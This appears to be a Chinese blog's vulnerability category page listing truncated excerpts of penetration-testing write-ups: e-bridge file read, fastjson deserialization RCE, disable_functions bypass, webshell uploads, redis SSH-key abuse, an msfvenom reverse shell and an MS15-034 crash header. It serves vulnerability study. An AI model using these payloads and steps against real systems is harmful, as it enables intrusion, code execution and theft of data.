![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
漏洞
文章平均质量分 51
一支神经病
这个作者很懒,什么都没留下…
展开
-
e-brige任意文件读取
漏洞复现首先访问/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt获取到一个id值然后访问file/fileNoLogin/[id]获取到C盘下的目录linux同理,可以读到更多配置文件然后我们发现/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/Users/Administrator/Deskto原创 2020-11-30 16:21:06 · 406 阅读 · 0 评论 -
fastjson反序列化利用
这是对fastjson反序列化的一次利用,关键信息会进行打码处理,且对方此漏洞已修复。首先确定下是否使用了fastjson在使用了json传数据的地方,尝试用一些特殊符号打算json的结构,使程序报错。我们尝试利用fastjson的漏洞参考及需要文件下载:https://github.com/CaijiOrz/fastjson-1.2.47-RCE/将下载好的其中一...原创 2019-11-27 11:12:26 · 3526 阅读 · 3 评论 -
利用ld_preload方式绕过disable_functions
参考链接:https://github.com/l3m0n/Bypass_Disable_functions_Shell连了菜刀无法执行命令系列。去看phpinfo(别问我怎么看,你都能上传一句话了,phpinfo不是问题好家伙!禁用了这么多函数,这可咋整行我去找方法了,试过了pcntl_exec的方法,没有成功,来用ld_preload绕过(mail啥也别说了,上马...原创 2019-08-06 14:39:55 · 1140 阅读 · 2 评论 -
OpenSNS 文件上传getshell
当前版本为OpenSNS V5首先需要登录到后台,默认密码为admin/123456可以进行尝试进来后台后,找到上传主题压缩包的地方,也可以直接访问http://xx.xxx.com/index.php?s=/admin/theme/add.html在这之前准备一个一句话,当然大马也可以,将你的一句话压缩成一个压缩包。如图所示,记住压缩前马的名字。点击上传主题压...原创 2019-08-06 13:36:06 · 995 阅读 · 0 评论 -
siteserver远程模板下载Getshell漏洞
此处不做分析,只做漏洞的复现。参考:https://www.freebuf.com/articles/web/195105.html准备工作:需要一台公网服务器,一个有漏洞的站点(肯定的对8)。第一步先写一个马,此处是aspx站点,自然是aspx的马,但因为会有拦截等,所以构造如下的马。<%@ Page Language="Jscript" Debug=true%&...原创 2019-03-28 11:44:05 · 4257 阅读 · 1 评论 -
CVE-2018-3191
通过该漏洞攻击者可以在未授权的情况下远程执行代码,该漏洞主要利用spring JDNI反序列化注入实现远程命令执行。攻击者可以在未授权的情况下将payload封装在T3协议中,通过T3协议中的Payload进行反序列化,从而实现对存在漏洞的weblogic组件进行远程攻击,执行任意代码并可获取目标系统的所有权限。受影响版本WebLogic 10.3.6.0WebLogic 12....原创 2018-11-03 13:32:51 · 1273 阅读 · 0 评论 -
SQL注入-绕过SQL通用防注入系统
当我们输入特殊字符,类似于单引号,and,or等时,经常会被注入系统拦截,并且这种是没有记录日志的。现在我们尝试绕过,get型的请求会被拦截,那post呢。emmm....也被拦了这个站点是asp的,那我们尝试用cookie传参,我们发现没有被防注入系统拦截。因此构造sqlmap语句sqlmap.py -u "http://www.xxxxx.com/...原创 2018-11-08 10:21:50 · 2816 阅读 · 0 评论 -
zabbix漏洞利用 CVE-2016-10134
首先,百度百科抄一下定义zabbix是一个基于web界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。zabbix server可以通过SNMP,zabbix a...原创 2018-11-14 13:54:07 · 3141 阅读 · 0 评论 -
CVE-2018-4407缓冲区溢出
此漏洞使得攻击者只要接入同一WIFI网络,即可向其他毫不知情的用户发送恶意数据包来触发Mac或IOS设备的崩溃和重启。由于该漏洞存在于系统网络核心代码,因此任何反病毒软件均无法防御。易受攻击的设备:Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备) Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新20...原创 2018-11-16 14:12:32 · 548 阅读 · 0 评论 -
JetBrains idea项目目录泄露
www.xx.com/.idea/workspace.xml //存储个人设置,会有网站的绝对路径等www.xx.com/.idea/dataSoures.xml //包含用于链接数据库和凭据的信息原创 2018-11-22 16:17:23 · 7809 阅读 · 0 评论 -
memcache未授权访问
memcache是国外社区网站Live Journal的开发团队开发的高性能的分布式内存缓存服务器。一般的使用目的是,通过缓存数据库查询结果,减少数据库访问次数,以提高动态Web应用的速度、提高扩展性。memcache的默认端口是11211,不需要密码即可访问,黑客直接访问即可获取数据库中所有信息,造成严重的信息泄露。漏洞验证利用telnet 探测目标11211端口telne...原创 2019-02-27 14:24:58 · 3250 阅读 · 0 评论 -
weblogic CVE-2018-2893
一、漏洞影响版本WebLogic 10.3.6.0WebLogic 12.1.3.0WebLogic 12.2.1.2WebLogic 12.2.1.3二、漏洞处置建议:1、美国甲骨文公司已发布了修复补丁,建议及时更新至最新版本:http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.ht...原创 2018-08-22 10:58:40 · 7580 阅读 · 1 评论 -
利用msf在windows下反弹shell
靶机地址:10.0.3.146攻击者地址:10.0.3.120思路:生成一个shell,让靶机下载下来并执行。方法一是利用ftp下载,方法二是利用可信证书下载http网站的内容。通过命令执行可以知道靶机是windows2003,32位的。(命令执行systeminfo)首先利用kali生成一个shell,命令:msfvenom -p windows/meterpreter...原创 2018-08-08 20:04:32 · 7096 阅读 · 0 评论 -
暴力破解+文件遍历(通过phpMyAdmin拿到shell)
公司测试地址:10.0.3.45测试地址是内网,外网访问不了这里暴力破解指目录暴破,对于phpMyAdmin来说,因为是弱口令这里就没有暴破,需要的话可以利用burp进行暴力破解还有一款专门用于phpMyAdmin的破解工具,不做演示了工具链接链接:https://pan.baidu.com/s/1Bcdt4sMR1KDRNzj_-bG4-g 密码:rq83今...原创 2018-08-03 18:05:58 · 5790 阅读 · 0 评论 -
redis未授权访问getshell
参考:https://blog.csdn.net/guxiaoguo/article/details/78913245利用条件:linux,对方开启ssh用到的工具:kali nmap redis公司测试服务器:10.0.3.45redis默认端口:6379主要思路:利用redis未授权访问命令给root账户写入SSH公钥文件,然后通过SSH登录服务器...原创 2018-08-02 21:51:24 · 5505 阅读 · 0 评论 -
php文件包含getshell
今天面试被问到这个了,已经是很久以前用到了,脑子一时短路,一点也想不起来,今天想捋一遍参考文件包含是应用程序(在这里就是指php函数引入文件时)未对要引用的文件做合理的校验,从而恶意的使应用程序操作了意料之外的文件,将会导致文件泄露,更有甚者会导致恶意代码的注入。先介绍一下本地文件包含LFI(Local File Include)举个最简单的例子,新建一个php文件,命...原创 2018-07-11 17:16:51 · 5555 阅读 · 0 评论 -
MS15-034测试方法
Range: bytes=0-18446744073709551615使用IIS作为WEB容器且使用版本存在编号为MS-15034的远程代码执行漏洞。利用该漏洞可轻易使服务器宕机蓝屏。发送测试代码,若返回“RequestedRangeNotSatisfiable”证明存在此漏洞。关于IIS远程代码执行漏洞针对该漏洞,建议根据官网升级对应漏洞版本补丁。...原创 2018-06-20 10:45:46 · 19815 阅读 · 0 评论 -
CVE-2017-11882利用
利用kail的msf进行攻击,首先打开kali,查看 IP,可以看到我的虚拟机kali的 IP是192.168.3.116。把Command43b_CVE-2017-11882.py下载下来放kali的桌面就可以。接下来就要把PS_shell.rb文件下载下来。就把PS_shell.rb和ms17-010.rb放一起吧。所有用到的资源:链接:https://pan.baidu.com/s/...原创 2018-06-20 10:41:43 · 1095 阅读 · 0 评论